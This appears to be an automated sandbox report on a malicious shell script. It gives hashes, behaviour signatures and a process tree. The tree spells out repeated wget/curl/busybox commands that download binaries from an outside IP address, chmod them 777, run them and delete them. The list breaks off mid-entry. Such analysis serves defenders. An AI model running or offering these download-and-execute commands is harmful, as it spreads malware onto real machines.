Analysis
-
max time kernel
69s -
max time network
74s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-11-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
-
Size
10KB
-
MD5
917b3d2f50ea971b48d53c43acb35304
-
SHA1
bfe50bdd2f5d3467fef4e1a330a33fa6467e3b31
-
SHA256
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
-
SHA512
0580e33716000342d8c2cb7288ca5d23607157542b578cd1f809877f776e9cade3cf808e804987ae0904bf5e8cb440e05090f15d6a7bce6e6af8e5b1b54b1cd4
-
SSDEEP
192:ES2PBbUb8bkbfbDbjfLN2uYRPn/6GpCe6MZRrNe6MZRH7gPn/6GibUb8bkbfbDb6:ES2P2fLN2uYfCe6MZRrNe6MZRH7CfLN8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 866 chmod 716 chmod 834 chmod 873 chmod 860 chmod 886 chmod 892 chmod 904 chmod 848 chmod 854 chmod 880 chmod 912 chmod 938 chmod 732 chmod 749 chmod 930 chmod 783 chmod 918 chmod 944 chmod 706 chmod 797 chmod 814 chmod 842 chmod 898 chmod 924 chmod 950 chmod 697 chmod 771 chmod -
Executes dropped EXE 28 IoCs
Processes:
A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3mNXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J84zJEHmamaz9O6V7VhaGDFe0W865iMc59OzW87e5c6aH2F8rqb0yul6w9V18uHPCHIYBvM6yXERkrkBAzeulbmz0voJENwQXQ2ja6OGRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIzlIaAGg82Vr6GeXKmHiv4lELympxeGoFdvEUuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4SQktCevJpk5dhjkcqzqBJTvtKdorD47CMCRFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5qw5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0SQktCevJpk5dhjkcqzqBJTvtKdorD47CMCRFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5qw5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3mNXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J84zJEHmamaz9O6V7VhaGDFe0W865iMc59OzW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6OGRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIzlIaAGg82Vr6GeXKmHiv4lELympxeGoFdvEUuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNxioc pid Process /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m 699 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J 707 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O 717 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB 733 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O 751 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz 772 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE 784 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx 798 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 815 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC 835 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ 843 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q 849 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 855 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 861 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC 867 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ 874 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q 881 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 887 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 893 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m 899 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J 905 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O 913 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB 919 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 925 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O 931 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz 939 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE 945 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx 951 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx curl File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC curl File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m curl File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O curl File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE curl File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 curl File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ curl File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 curl File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O curl File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB curl File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 curl File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE curl File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz curl File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 curl File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m curl File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O curl File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz curl File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J curl File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O curl File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 curl File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx curl File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB curl File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q curl File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J curl File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ curl File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC curl File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q curl File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 curl
Processes
-
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh1⤵PID:666
-
/bin/rm/bin/rm bins.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:693
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:701
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:705
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:708
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:709
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:713
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:718
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:729
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:745
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:752
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:753
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:766
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:775
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:782
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:793
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:810
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:831
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:836
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:837
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:839
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:844
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:845
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:847
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:853
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:859
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:865
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:871
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
